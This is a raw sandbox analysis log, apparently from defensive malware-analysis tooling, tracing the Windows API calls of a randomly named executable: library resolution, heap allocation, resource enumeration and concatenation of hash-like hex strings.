# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 27.08.2020 14:23:36.804 Process: id = "1" image_name = "o4gkftfmo8yrukhr.exe" filename = "c:\\users\\fd1hvy\\desktop\\o4gkftfmo8yrukhr.exe" page_root = "0x6a59000" os_pid = "0xd08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x560" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xa90 [0073.663] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x772d0000 [0073.664] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleW") returned 0x772e50d0 [0073.665] GetProcAddress (hModule=0x772d0000, lpProcName="HeapCreate") returned 0x772e57b0 [0073.665] GetProcAddress (hModule=0x772d0000, lpProcName="GetStdHandle") returned 0x772e5330 [0073.665] GetProcAddress (hModule=0x772d0000, lpProcName="HeapDestroy") returned 0x772e57d0 [0073.665] GetProcAddress (hModule=0x772d0000, lpProcName="ExitProcess") returned 0x772e3cb0 [0073.665] GetProcAddress (hModule=0x772d0000, lpProcName="WriteFile") returned 0x7733f180 [0073.665] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempFileNameW") returned 0x7733efd0 [0073.665] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryExW") returned 0x772e5ac0 [0073.665] GetProcAddress (hModule=0x772d0000, lpProcName="EnumResourceTypesW") returned 0x772e22e0 [0073.665] GetProcAddress (hModule=0x772d0000, lpProcName="FreeLibrary") returned 0x772e4c40 [0073.665] GetProcAddress (hModule=0x772d0000, lpProcName="RemoveDirectoryW") returned 0x7733f0d0 [0073.666] GetProcAddress (hModule=0x772d0000, lpProcName="GetExitCodeProcess") returned 0x772e3c60 [0073.666] GetProcAddress (hModule=0x772d0000, lpProcName="EnumResourceNamesW") returned 0x7733f1b0 [0073.666] GetProcAddress (hModule=0x772d0000, lpProcName="GetCommandLineW") returned 0x772e4cc0 [0073.666] GetProcAddress (hModule=0x772d0000, lpProcName="LoadResource") returned 0x772e5b00 [0073.666] GetProcAddress (hModule=0x772d0000, lpProcName="SizeofResource") returned 0x772e6740 [0073.666] GetProcAddress (hModule=0x772d0000, lpProcName="FreeResource") returned 0x772e4c80 [0073.666] GetProcAddress (hModule=0x772d0000, lpProcName="FindResourceW") returned 0x772e4aa0 [0073.666] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0073.666] GetProcAddress (hModule=0x772d0000, lpProcName="GetShortPathNameW") returned 0x773110d0 [0073.666] GetProcAddress (hModule=0x772d0000, lpProcName="GetWindowsDirectoryW") returned 0x772e5730 [0073.667] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemDirectoryW") returned 0x772e5490 [0073.667] GetProcAddress (hModule=0x772d0000, lpProcName="EnterCriticalSection") returned 0x779bb2d0 [0073.667] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0073.667] GetProcAddress (hModule=0x772d0000, lpProcName="LeaveCriticalSection") returned 0x779bb250 [0073.667] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeCriticalSection") returned 0x779caf20 [0073.667] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForSingleObject") returned 0x7733eca0 [0073.667] GetProcAddress (hModule=0x772d0000, lpProcName="TerminateThread") returned 0x772e6800 [0073.667] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThread") returned 0x772e46b0 [0073.668] GetProcAddress (hModule=0x772d0000, lpProcName="Sleep") returned 0x772e6760 [0073.668] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcAddress") returned 0x772e51b0 [0073.668] GetProcAddress (hModule=0x772d0000, lpProcName="GetVersionExW") returned 0x772e56f0 [0073.668] GetProcAddress (hModule=0x772d0000, lpProcName="WideCharToMultiByte") returned 0x772e6b10 [0073.668] GetProcAddress (hModule=0x772d0000, lpProcName="HeapAlloc") returned 0x779b2dc0 [0073.668] GetProcAddress (hModule=0x772d0000, lpProcName="HeapFree") returned 0x772e57f0 [0073.668] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryW") returned 0x772e5ae0 [0073.668] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessId") returned 0x7733ea20 [0073.668] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentThreadId") returned 0x772e8820 [0073.668] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleFileNameW") returned 0x772e5090 [0073.669] GetProcAddress (hModule=0x772d0000, lpProcName="GetEnvironmentVariableW") returned 0x772e4fb0 [0073.669] GetProcAddress (hModule=0x772d0000, lpProcName="SetEnvironmentVariableW") returned 0x772e64e0 [0073.669] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcess") returned 0x7733ea10 [0073.669] GetProcAddress (hModule=0x772d0000, lpProcName="TerminateProcess") returned 0x772e67e0 [0073.669] GetProcAddress (hModule=0x772d0000, lpProcName="SetUnhandledExceptionFilter") returned 0x772e6720 [0073.669] GetProcAddress (hModule=0x772d0000, lpProcName="HeapSize") returned 0x779ca790 [0073.669] GetProcAddress (hModule=0x772d0000, lpProcName="MultiByteToWideChar") returned 0x772e5c40 [0073.669] GetProcAddress (hModule=0x772d0000, lpProcName="CreateDirectoryW") returned 0x7733ece0 [0073.669] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileAttributesW") returned 0x7733f100 [0073.669] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempPathW") returned 0x7733eff0 [0073.669] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteFileW") returned 0x7733ed40 [0073.669] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentDirectoryW") returned 0x772e4e80 [0073.670] GetProcAddress (hModule=0x772d0000, lpProcName="SetCurrentDirectoryW") returned 0x772e64a0 [0073.670] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0073.670] GetProcAddress (hModule=0x772d0000, lpProcName="SetFilePointer") returned 0x7733f120 [0073.670] GetProcAddress (hModule=0x772d0000, lpProcName="TlsFree") returned 0x772e6830 [0073.670] GetProcAddress (hModule=0x772d0000, lpProcName="TlsGetValue") returned 0x772e6850 [0073.670] GetProcAddress (hModule=0x772d0000, lpProcName="TlsSetValue") returned 0x772e6870 [0073.670] GetProcAddress (hModule=0x772d0000, lpProcName="TlsAlloc") returned 0x772e6820 [0073.670] GetProcAddress (hModule=0x772d0000, lpProcName="HeapReAlloc") returned 0x779af630 [0073.670] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteCriticalSection") returned 0x7799fb90 [0073.671] GetProcAddress (hModule=0x772d0000, lpProcName="InterlockedCompareExchange") returned 0x772e73a0 [0073.671] GetProcAddress (hModule=0x772d0000, lpProcName="InterlockedExchange") returned 0x772e73e0 [0073.671] GetProcAddress (hModule=0x772d0000, lpProcName="GetLastError") returned 0x772e5010 [0073.671] GetProcAddress (hModule=0x772d0000, lpProcName="SetLastError") returned 0x772e4f00 [0073.671] GetProcAddress (hModule=0x772d0000, lpProcName="UnregisterWait") returned 0x7731c850 [0073.671] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentThread") returned 0x772e8810 [0073.671] GetProcAddress (hModule=0x772d0000, lpProcName="DuplicateHandle") returned 0x7733eac0 [0073.671] GetProcAddress (hModule=0x772d0000, lpProcName="RegisterWaitForSingleObject") returned 0x7731c7d0 [0073.671] LoadLibraryA (lpLibFileName="COMCTL32.DLL") returned 0x740d0000 [0073.671] GetProcAddress (hModule=0x740d0000, lpProcName="InitCommonControlsEx") returned 0x7414a480 [0073.671] LoadLibraryA (lpLibFileName="GDI32.DLL") returned 0x74910000 [0073.671] GetProcAddress (hModule=0x74910000, lpProcName="GetStockObject") returned 0x749166c0 [0073.672] LoadLibraryA (lpLibFileName="MSVCRT.dll") returned 0x77640000 [0073.672] GetProcAddress (hModule=0x77640000, lpProcName="memset") returned 0x776c8360 [0073.672] GetProcAddress (hModule=0x77640000, lpProcName="wcsncmp") returned 0x776c9380 [0073.672] GetProcAddress (hModule=0x77640000, lpProcName="memmove") returned 0x776c7f90 [0073.672] GetProcAddress (hModule=0x77640000, lpProcName="wcsncpy") returned 0x776c93c0 [0073.672] GetProcAddress (hModule=0x77640000, lpProcName="wcsstr") returned 0x776c9600 [0073.672] GetProcAddress (hModule=0x77640000, lpProcName="_wcsnicmp") returned 0x776c7000 [0073.672] GetProcAddress (hModule=0x77640000, lpProcName="_wcsdup") returned 0x776c6860 [0073.672] GetProcAddress (hModule=0x77640000, lpProcName="free") returned 0x77687070 [0073.672] GetProcAddress (hModule=0x77640000, lpProcName="_wcsicmp") returned 0x776c68f0 [0073.672] GetProcAddress (hModule=0x77640000, lpProcName="wcslen") returned 0x776c9200 [0073.673] GetProcAddress (hModule=0x77640000, lpProcName="wcscpy") returned 0x776c8ff0 [0073.673] GetProcAddress (hModule=0x77640000, lpProcName="wcscmp") returned 0x776c90e0 [0073.673] GetProcAddress (hModule=0x77640000, lpProcName="memcpy") returned 0x776c7b70 [0073.673] GetProcAddress (hModule=0x77640000, lpProcName="tolower") returned 0x77672520 [0073.673] GetProcAddress (hModule=0x77640000, lpProcName="wcscat") returned 0x776c8fb0 [0073.673] GetProcAddress (hModule=0x77640000, lpProcName="malloc") returned 0x77687230 [0073.673] LoadLibraryA (lpLibFileName="OLE32.DLL") returned 0x753c0000 [0073.673] GetProcAddress (hModule=0x753c0000, lpProcName="CoInitialize") returned 0x753f6a60 [0073.673] GetProcAddress (hModule=0x753c0000, lpProcName="CoTaskMemFree") returned 0x749b64b0 [0073.673] LoadLibraryA (lpLibFileName="SHELL32.DLL") returned 0x75760000 [0073.673] GetProcAddress (hModule=0x75760000, lpProcName="ShellExecuteExW") returned 0x758c4730 [0073.674] GetProcAddress (hModule=0x75760000, lpProcName="SHGetFolderLocation") returned 0x75844530 [0073.674] GetProcAddress (hModule=0x75760000, lpProcName="SHGetPathFromIDListW") returned 0x7586bda0 [0073.674] LoadLibraryA (lpLibFileName="SHLWAPI.DLL") returned 0x76ba0000 [0073.674] GetProcAddress (hModule=0x76ba0000, lpProcName="PathAddBackslashW") returned 0x76bb48e0 [0073.674] GetProcAddress (hModule=0x76ba0000, lpProcName="PathRenameExtensionW") returned 0x76bbc440 [0073.674] GetProcAddress (hModule=0x76ba0000, lpProcName="PathQuoteSpacesW") returned 0x76bbc360 [0073.674] GetProcAddress (hModule=0x76ba0000, lpProcName="PathRemoveArgsW") returned 0x76bb3da0 [0073.674] GetProcAddress (hModule=0x76ba0000, lpProcName="PathRemoveBackslashW") returned 0x76bb4150 [0073.674] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x750c0000 [0073.674] GetProcAddress (hModule=0x750c0000, lpProcName="CharUpperW") returned 0x750f0f70 [0073.674] GetProcAddress (hModule=0x750c0000, lpProcName="CharLowerW") returned 0x751375d0 [0073.675] GetProcAddress (hModule=0x750c0000, lpProcName="MessageBoxW") returned 0x7512db70 [0073.675] GetProcAddress (hModule=0x750c0000, lpProcName="DefWindowProcW") returned 0x743c0140 [0073.675] GetProcAddress (hModule=0x750c0000, lpProcName="DestroyWindow") returned 0x743c1c10 [0073.675] GetProcAddress (hModule=0x750c0000, lpProcName="GetWindowLongW") returned 0x743c0020 [0073.675] GetProcAddress (hModule=0x750c0000, lpProcName="GetWindowTextLengthW") returned 0x750ccc40 [0073.675] GetProcAddress (hModule=0x750c0000, lpProcName="GetWindowTextW") returned 0x750ceac0 [0073.675] GetProcAddress (hModule=0x750c0000, lpProcName="UnregisterClassW") returned 0x750e8630 [0073.675] GetProcAddress (hModule=0x750c0000, lpProcName="LoadIconW") returned 0x750e8420 [0073.675] GetProcAddress (hModule=0x750c0000, lpProcName="LoadCursorW") returned 0x750eab40 [0073.675] GetProcAddress (hModule=0x750c0000, lpProcName="RegisterClassExW") returned 0x750e84a0 [0073.676] GetProcAddress (hModule=0x750c0000, lpProcName="IsWindowEnabled") returned 0x750da220 [0073.676] GetProcAddress (hModule=0x750c0000, lpProcName="EnableWindow") returned 0x750e0a60 [0073.676] GetProcAddress (hModule=0x750c0000, lpProcName="GetSystemMetrics") returned 0x750eddc0 [0073.676] GetProcAddress (hModule=0x750c0000, lpProcName="CreateWindowExW") returned 0x750e8780 [0073.676] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowLongW") returned 0x743c1ab0 [0073.676] GetProcAddress (hModule=0x750c0000, lpProcName="SendMessageW") returned 0x750d07d0 [0073.676] GetProcAddress (hModule=0x750c0000, lpProcName="SetFocus") returned 0x750f3d10 [0073.676] GetProcAddress (hModule=0x750c0000, lpProcName="CreateAcceleratorTableW") returned 0x750f30f0 [0073.676] GetProcAddress (hModule=0x750c0000, lpProcName="SetForegroundWindow") returned 0x750e2900 [0073.676] GetProcAddress (hModule=0x750c0000, lpProcName="BringWindowToTop") returned 0x750e1fc0 [0073.676] GetProcAddress (hModule=0x750c0000, lpProcName="GetMessageW") returned 0x750efea0 [0073.676] GetProcAddress (hModule=0x750c0000, lpProcName="TranslateAcceleratorW") returned 0x750dd9c0 [0073.677] GetProcAddress (hModule=0x750c0000, lpProcName="TranslateMessage") returned 0x750ef900 [0073.677] GetProcAddress (hModule=0x750c0000, lpProcName="DispatchMessageW") returned 0x750e4840 [0073.677] GetProcAddress (hModule=0x750c0000, lpProcName="DestroyAcceleratorTable") returned 0x750dd2a0 [0073.677] GetProcAddress (hModule=0x750c0000, lpProcName="PostMessageW") returned 0x750ef870 [0073.677] GetProcAddress (hModule=0x750c0000, lpProcName="GetForegroundWindow") returned 0x750f3420 [0073.677] GetProcAddress (hModule=0x750c0000, lpProcName="GetWindowThreadProcessId") returned 0x750eeb60 [0073.677] GetProcAddress (hModule=0x750c0000, lpProcName="IsWindowVisible") returned 0x750d77b0 [0073.677] GetProcAddress (hModule=0x750c0000, lpProcName="EnumWindows") returned 0x750da3c0 [0073.677] GetProcAddress (hModule=0x750c0000, lpProcName="SetWindowPos") returned 0x750f3e90 [0073.677] LoadLibraryA (lpLibFileName="WINMM.DLL") returned 0x740a0000 [0073.677] GetProcAddress (hModule=0x740a0000, lpProcName="timeBeginPeriod") returned 0x740a4350 [0073.677] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0073.678] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0073.678] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0073.678] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2a90000 [0073.679] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2a60000 [0073.679] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a605a8 [0073.679] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10) returned 0x2a605c0 [0073.679] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x38) returned 0x2a905a8 [0073.679] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x40) returned 0x2a905e8 [0073.679] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x10e0000 [0073.680] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x10) returned 0x2a90630 [0073.680] RtlReAllocateHeap (Heap=0x2a90000, Flags=0x8, Ptr=0x2a90630, Size=0x10) returned 0x2a90630 [0073.680] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x38) returned 0x2a90648 [0073.680] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x10) returned 0x2a90688 [0073.680] InitCommonControlsEx (picce=0x19ff74) returned 1 [0073.713] CoInitialize (pvReserved=0x0) returned 0x0 [0075.289] wcslen (_String="*") returned 0x1 [0075.289] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a605d8 [0075.289] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0075.289] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x3c) returned 0x2a906a0 [0075.289] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x800) returned 0x2a906e8 [0075.289] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x772d0000 [0075.289] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0075.289] InitOnceExecuteOnce (in: InitOnce=0x417614, InitFn=0x40d9c3, Parameter=0x40d982, Context=0x19ff24 | out: InitOnce=0x417614, Parameter=0x40d982, Context=0x19ff24*=0x4) returned 1 [0075.289] FreeLibrary (hLibModule=0x772d0000) returned 1 [0075.289] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x18) returned 0x2a90ef0 [0075.290] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x38) returned 0x2a90f10 [0075.290] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0xc) returned 0x2a90f50 [0075.290] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x34) returned 0x2a90f68 [0075.290] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x772d0000 [0075.290] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0075.290] InitOnceExecuteOnce (in: InitOnce=0x417614, InitFn=0x40d9c3, Parameter=0x40d982, Context=0x19ff2c | out: InitOnce=0x417614, Parameter=0x40d982, Context=0x19ff2c*=0x4) returned 1 [0075.290] FreeLibrary (hLibModule=0x772d0000) returned 1 [0075.290] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x18) returned 0x2a90fa8 [0075.290] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x38) returned 0x2a90fc8 [0075.290] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x34) returned 0x2a91008 [0075.290] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x772d0000 [0075.291] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0075.291] InitOnceExecuteOnce (in: InitOnce=0x417614, InitFn=0x40d9c3, Parameter=0x40d982, Context=0x19ff2c | out: InitOnce=0x417614, Parameter=0x40d982, Context=0x19ff2c*=0x4) returned 1 [0075.291] FreeLibrary (hLibModule=0x772d0000) returned 1 [0075.291] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x124fa4) returned 0x2aa8020 [0075.315] wcslen (_String="\\") returned 0x1 [0075.315] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a605f0 [0075.315] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x34) returned 0x2a91048 [0075.315] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x772d0000 [0075.315] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0075.315] InitOnceExecuteOnce (in: InitOnce=0x417614, InitFn=0x40d9c3, Parameter=0x40d982, Context=0x19ff2c | out: InitOnce=0x417614, Parameter=0x40d982, Context=0x19ff2c*=0x4) returned 1 [0075.315] FreeLibrary (hLibModule=0x772d0000) returned 1 [0075.315] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x409890) returned 0x0 [0075.316] GetLastError () returned 0x0 [0075.316] SetLastError (dwErrCode=0x0) [0075.316] GetLastError () returned 0x0 [0075.316] SetLastError (dwErrCode=0x0) [0075.316] GetLastError () returned 0x0 [0075.316] SetLastError (dwErrCode=0x0) [0075.316] GetLastError () returned 0x0 [0075.316] SetLastError (dwErrCode=0x0) [0075.316] GetLastError () returned 0x0 [0075.316] SetLastError (dwErrCode=0x0) [0075.316] GetLastError () returned 0x0 [0075.316] SetLastError (dwErrCode=0x0) [0075.316] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x9c) returned 0x2a91088 [0075.316] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a605c0, Size=0x404a) returned 0x2a60608 [0075.317] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91088 | out: hHeap=0x2a90000) returned 1 [0075.317] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a64660 [0075.317] GetLastError () returned 0x0 [0075.317] SetLastError (dwErrCode=0x0) [0075.317] GetLastError () returned 0x0 [0075.317] SetLastError (dwErrCode=0x0) [0075.317] GetLastError () returned 0x0 [0075.317] SetLastError (dwErrCode=0x0) [0075.318] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x2a60608, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\o4gkftfmo8yrukhr.exe")) returned 0x2c [0075.318] wcscmp (_String1="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe", _String2="\\\\?\\") returned -1 [0075.318] LoadLibraryExW (lpLibFileName="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe", hFile=0x0, dwFlags=0x2) returned 0x400000 [0075.318] GetLastError () returned 0x0 [0075.318] SetLastError (dwErrCode=0x0) [0075.318] EnumResourceTypesW (hModule=0x400000, lpEnumFunc=0x402109, lParam=0x0) returned 1 [0075.456] EnumResourceNamesW (hModule=0x400000, lpType=0xa, lpEnumFunc=0x402e57, lParam=0x0) returned 1 [0075.456] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x118) returned 0x2a91088 [0075.456] GetLastError () returned 0x0 [0075.456] SetLastError (dwErrCode=0x0) [0075.456] GetLastError () returned 0x0 [0075.456] SetLastError (dwErrCode=0x0) [0075.456] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a646b8 [0075.457] GetLastError () returned 0x0 [0075.457] SetLastError (dwErrCode=0x0) [0075.457] GetLastError () returned 0x0 [0075.457] SetLastError (dwErrCode=0x0) [0075.457] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a64720 [0075.457] GetLastError () returned 0x0 [0075.457] SetLastError (dwErrCode=0x0) [0075.457] GetLastError () returned 0x0 [0075.457] SetLastError (dwErrCode=0x0) [0075.457] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a64788 [0075.457] GetLastError () returned 0x0 [0075.457] SetLastError (dwErrCode=0x0) [0075.458] GetLastError () returned 0x0 [0075.458] SetLastError (dwErrCode=0x0) [0075.458] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a647f0 [0075.458] GetLastError () returned 0x0 [0075.458] SetLastError (dwErrCode=0x0) [0075.458] GetLastError () returned 0x0 [0075.458] SetLastError (dwErrCode=0x0) [0075.458] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a64858 [0075.458] GetLastError () returned 0x0 [0075.458] SetLastError (dwErrCode=0x0) [0075.458] GetLastError () returned 0x0 [0075.458] SetLastError (dwErrCode=0x0) [0075.458] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a648c0 [0075.459] GetLastError () returned 0x0 [0075.459] SetLastError (dwErrCode=0x0) [0075.459] GetLastError () returned 0x0 [0075.459] SetLastError (dwErrCode=0x0) [0075.459] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a64928 [0075.459] GetLastError () returned 0x0 [0075.459] SetLastError (dwErrCode=0x0) [0075.459] GetLastError () returned 0x0 [0075.459] SetLastError (dwErrCode=0x0) [0075.459] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a64990 [0075.459] GetLastError () returned 0x0 [0075.460] SetLastError (dwErrCode=0x0) [0075.460] GetLastError () returned 0x0 [0075.460] SetLastError (dwErrCode=0x0) [0075.460] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a649f8 [0075.460] GetLastError () returned 0x0 [0075.460] SetLastError (dwErrCode=0x0) [0075.460] GetLastError () returned 0x0 [0075.460] SetLastError (dwErrCode=0x0) [0075.460] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a64a20 [0075.460] GetLastError () returned 0x0 [0075.460] SetLastError (dwErrCode=0x0) [0075.460] GetLastError () returned 0x0 [0075.460] SetLastError (dwErrCode=0x0) [0075.461] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a64a78 [0075.461] GetLastError () returned 0x0 [0075.461] SetLastError (dwErrCode=0x0) [0075.461] GetLastError () returned 0x0 [0075.461] SetLastError (dwErrCode=0x0) [0075.461] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a64ad0 [0075.461] GetLastError () returned 0x0 [0075.461] SetLastError (dwErrCode=0x0) [0075.461] GetLastError () returned 0x0 [0075.461] SetLastError (dwErrCode=0x0) [0075.461] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a64b38 [0075.461] GetLastError () returned 0x0 [0075.462] SetLastError (dwErrCode=0x0) [0075.462] GetLastError () returned 0x0 [0075.462] SetLastError (dwErrCode=0x0) [0075.462] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a64ba0 [0075.462] FreeLibrary (hLibModule=0x400000) returned 1 [0075.462] GetLastError () returned 0x0 [0075.462] SetLastError (dwErrCode=0x0) [0075.462] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE") returned 0x28 [0075.462] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a64bf8 [0075.462] GetLastError () returned 0x0 [0075.462] SetLastError (dwErrCode=0x0) [0075.462] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE") returned 0x28 [0075.462] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a64c60 [0075.462] GetLastError () returned 0x0 [0075.463] SetLastError (dwErrCode=0x0) [0075.463] wcslen (_String="1414E454795409646911251817EBF527D4410965") returned 0x28 [0075.463] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64bf8, Size=0x5a) returned 0x2a64bf8 [0075.463] GetLastError () returned 0x0 [0075.463] SetLastError (dwErrCode=0x0) [0075.463] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE") returned 0x28 [0075.463] wcslen (_String="1414E454795409646911251817EBF527D4410965") returned 0x28 [0075.463] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64c60, Size=0xaa) returned 0x2a64c60 [0075.463] GetLastError () returned 0x0 [0075.463] SetLastError (dwErrCode=0x0) [0075.463] wcslen (_String="1A299A3963494F91D25C8AF26AC4ADD96F66DE5B") returned 0x28 [0075.463] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64bf8, Size=0x5a) returned 0x2a64bf8 [0075.463] GetLastError () returned 0x0 [0075.463] SetLastError (dwErrCode=0x0) [0075.463] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE1414E454795409646911251817EBF527D4410965") returned 0x50 [0075.463] wcslen (_String="1A299A3963494F91D25C8AF26AC4ADD96F66DE5B") returned 0x28 [0075.463] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64c60, Size=0xfa) returned 0x2a64c60 [0075.464] GetLastError () returned 0x0 [0075.464] SetLastError (dwErrCode=0x0) [0075.464] wcslen (_String="2DB51863AEBA2EEA48BEA1E93A2B15AE1159E07B") returned 0x28 [0075.464] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64bf8, Size=0x5a) returned 0x2a64bf8 [0075.464] GetLastError () returned 0x0 [0075.464] SetLastError (dwErrCode=0x0) [0075.464] wcslen (_String="0C9817D00B9AAF55FB994195105C29D832946BFE1414E454795409646911251817EBF527D44109651A299A3963494F91D25C8AF26AC4ADD96F66DE5B") returned 0x78 [0075.464] wcslen (_String="2DB51863AEBA2EEA48BEA1E93A2B15AE1159E07B") returned 0x28 [0075.464] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64c60, Size=0x14a) returned 0x2a64c60 [0075.464] GetLastError () returned 0x0 